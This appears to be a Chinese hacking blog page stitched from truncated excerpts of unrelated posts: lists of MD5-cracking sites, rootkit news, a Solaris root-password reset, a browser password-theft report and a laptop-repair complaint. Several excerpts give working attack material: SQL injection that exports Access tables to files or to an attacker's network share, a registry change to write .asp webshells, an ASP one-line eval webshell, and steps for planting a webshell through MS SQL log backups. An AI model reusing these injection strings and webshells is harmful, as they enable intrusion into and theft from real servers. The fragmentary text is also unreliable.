Hack Eye!

通过此代码来根据访问者浏览器的语言来识别访问者所可能的语言类型，从而返回相应的语言页面来给访问者！
 <%= Request.ServerVariables("HTTP_ACCEPT_LANGUAGE") %>

Neeao收集整理，转载请注明来源，谢谢
不断更新中……
http://alimamed.pp.ru/md5/
http://www.phpbbhacks.com/md5.php
http://md5.shalla.de/cgi-bin/search.cgi
http://www.schwett.com/md5/ ***
http://www.clicasso.fr/outils/md5.php
http://www.iwebtool.com/md5/
http://md5.benramsey.com/
http://csthis.com/md5/index.php
http://shm.hard-core.pl/md5/
http://md5.altervista.org/
http://md5.allfact.info/
http://www.acecoolco.com/tool_md5.php
http://tools.elitehackers.info/md5.php
http://md5.geeks.li/
http://bokehman.com/cracker/
http://www.thepanicroom.org
http://md5.overclock.ch
http://www.tydal.nu/article/md5-crack/
http://md5.neeao.com/
以上网站为Neeao补充添加的，转载请注明，谢谢！
http://www.xmd5.org/
http://www.milw0rm.com/md5/info.php 数据已经集成到了http://md5.neeao.com/
http://md5.mmkey.com/ 数据已经集成到了http://md5.neeao.com/
http://gdataonline.com/seekhash.php 数据已经集成到了http://md5.neeao.com/
http://www.plain-text.info/search.php
http://passcracking.com/Good_values_list.asp
http://www.hashchecker.com/index.php?_sls=search_hash
http://md5.rednoize.com/ …

来自：鬼仔's blogNeeao:纪念一下！在 Sowhat 那里看到这个消息，然后我去原帖看了下。。整理了一下。。
鬼仔：Hacker Defender 大家都知道吧？国外有个论坛说其作者死于车祸了，并对 hxdef 做出高度评价，叙述了 hxdef 对业界的影响。不过目前消息还没被得到证实，如果是真的，那就真的太可惜了，一位牛人啊。。是有人在 Sysinternals Forums 发了一篇名为“Rootkit author Killed !”的帖子，内容如下：

引用至 SpannerITWks
hf = Holy Father,…

来自：http://hi.baidu.com/monyer/
核心还是原来那个批处理！
加入了自动判断U盘功能
更加人性化的设计（由于本身没有什么技术含量，所以就不做gui的东西了。）
需要的朋友可以直接到http://dohi.cn/soft/UDisk.rar进行下载
解压到桌面，不需要任何设置，用到时双击即可。
另外由于批处理具有很大的危险性，所以下载该程序时请一定到Monyer提供的站点下载，升级也一样！否则后果自负！
目前可查杀的病毒数量为19种！

By:lake2
已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了，也只是听说而已，具体的细节还是不得而知。
最近在看的书中一章提到Jet的安全，然后灵光一闪，呵呵，发现了一种可以利用access导出asp的方法，分享之。
几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件（可导出txt、htm、html等格式）的方法：
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
执行上述语句，在d:\web目录下就会生成test.txt文件，其内容就是表admin的内容。但是导出asp格式就不行，会说“不能更新，数据库或对象为只读”。
其实控制导出文件后缀是存储在注册表的，具体键值是HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension，默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”，如果我们把asp也添加进去的话，呵呵，就可以导出asp格式的文件了。
这个方法跟那个调用Access的Shell函数执行命令一样，要修改注册表，所以利用不是很大。
顺便提一下，前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦：SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin

来自：s0n9 '5 b109
<%eval(request("a")):response.end%> 备分专用一句话加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
日志备分WEBSHELL标准的七步:
1.InjectionURL';alter database XXX set RECOVERY FULL– (把SQL设置成日志完全恢复模式)
2.InjectionURL';create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL';backup log XXX to disk =…

信息来源：网络
一:solarisROOT密码遗忘的处理方法　　1，如果还能用普通用户登陆的话，%df /etc，确定包含/etc目录分区的设备名
　　%df /etc
　　/ /dev/dsk/c0t0d0s0…
　　此例中是c0t0d0s0，如果你的根目录分区设备不一样的话，替换一下就可以啦
　　2，把系统盘插入cdrom中
　　3，出现提示符后，使用sync命令刷新文件系统
　　4，按下stop+A
　　5，"ok"状态下键入boot cdrom -s
　　6，在"#"提示符下键入mkdir /temp ，然后键入mount /dev/dsk/c0t0d0s0 /temp
　　如果出现挂接不上的情况时，那么就运行fsck先 fsck /dev/rdsk/c0t0d0s0，然后在mount
　　7，cd /temp/etc
　　8，cp shadow shadowbak
　　9，cat shadow
　　得到root的口令字符串
　　root:djglcj0J:6453:::其中djglcj0J就是root的加密后的口令字符串)
　　10，sed s/djglcj0J// shadow>shadownew
　　11，cat shadownew查看是否已经变为
　　root::6453::::
　　12，cp shadownew…

Firefox 2 和IE 7都存在一个缺陷，黑客可能利用该缺陷窃取用户的密码。
　　该缺陷被其发现者罗伯特称作是“逆向跨站点请求”（RCSR），它使黑客能够通过显示一个虚假的登录表单而窃取用户的帐户名和密码。
　　Firefox Password Manager会自动地在表单中输入保存的帐户名和密码。数据会在用户不知情的情况下被发送给黑客的计算机。
　　据罗伯特称，利用该缺陷的代码已经出现在社交网站MySpace.com 上，它会影响所有使用能够添加用户生成的HTML代码的博客或论坛的用户。
　　他说，Firefox 和IE用户必须意识到，当访问可信赖的博客或论坛网站时，他们的资料可能会在不知不觉之间被窃取。
　　据在MySpace 上发现该利用代码的安全公司Netcraft称，由于虚假的网页不会显示出任何外部内容的蛛丝马迹，因此，即使是最有安全意识的用户也可能上当受骗。
　　攻击是由一个档案网页发动的，它利用特别设计的HTML隐藏真实的MySpace 内容，而显示它自己的登录表单。
　　罗伯特表示，RCSR攻击成功的机率要大于跨站点脚本（XSS ）攻击，因为在用户提交表单前，IE和Firefox 都不会检查表单数据的目的地。由于攻击是在可信赖的站点上发生的，浏览器也不会报警。
　　RCSR攻击对于Firefox 更为危险，因为除非RCSR表单出现在合法的登录网页上，IE不会自动地填写保存的用户名和密码。
　　截止记者发稿时，Mozilla 还没有发布补丁软件。有媒体报道称Mozilla 正在开发针对Firefox 2 的补丁软件，但目前还不清楚早期版本的Firefox 是否会受到影响。安全厂商Secunia 已经建议用户关闭Firefox 的“保存站点密码”选项。
　　要利用该缺陷，黑客必须在一个可信赖的网站上创建一个虚假的登录表单。网站管理员必须检查服务器代码中是否感染有XSS…

来自：鬼仔‘sblog
从一位叫 like 的朋友那里得知这个小工具的，然后去 google 了一下，就有了这篇日志。
Bambalam PHP EXE Compiler/Embedder 是一个小巧的命令行工具，能够把 php 脚本转换成 windows 的标准 exe 可执行文件，我们可以用他把那些 php 写的 exp 转换成 exe…

月初，本本无缘无故的就罢工了，显示屏白屏了，送修去了，说一个礼拜搞定。一个礼拜后打电话说什么物流出了问题，本本还没到维修中心，让我再等几天，我汗！10天后，又打电话，说本本已修好了，已经发到郑州途中，三天后应该可以到郑州了，说到了给我电话！三天后，打电话有问，说本本修好了，忘记发货了，我汗，我本本送的是武汉的acer维修中心，说后天下午应该到！2天后，下午5点，打电话问，说本本到郑州了，物流说明天才送货，我日！tnnd！第二天上午，去取本本，9点上班的，9点40左右到的，本本竟然还没送到，等到10点半，终于拿到了本本！一看维修单，顿时晕了，维修单上写的竟然是：未发现用户描述的故障！tnnd，没故障我干嘛送修啊，不过本本确实是一会好，一会不好的！tnnd！算了，好不容易回来了，打开试试，也没问题。问还有问题没了，说肯定不会出现问题了，拿着走了！虽然不爽吧，不过总算回来了，但愿不会出问题，回到老婆学校试试，后没问题了！下午决定回洛阳，买票，在候车室无聊，打开本本玩，谁知道，tnnd又白屏了！无语了！打电话问怎么说，说到洛阳后再发过去？？？？？？？？？？？？？无语了，彻底无语，送修了半个月之多，竟然没找到哪里的问题！不知道acer武汉维系中心的人干什么吃的！明天继续送修去！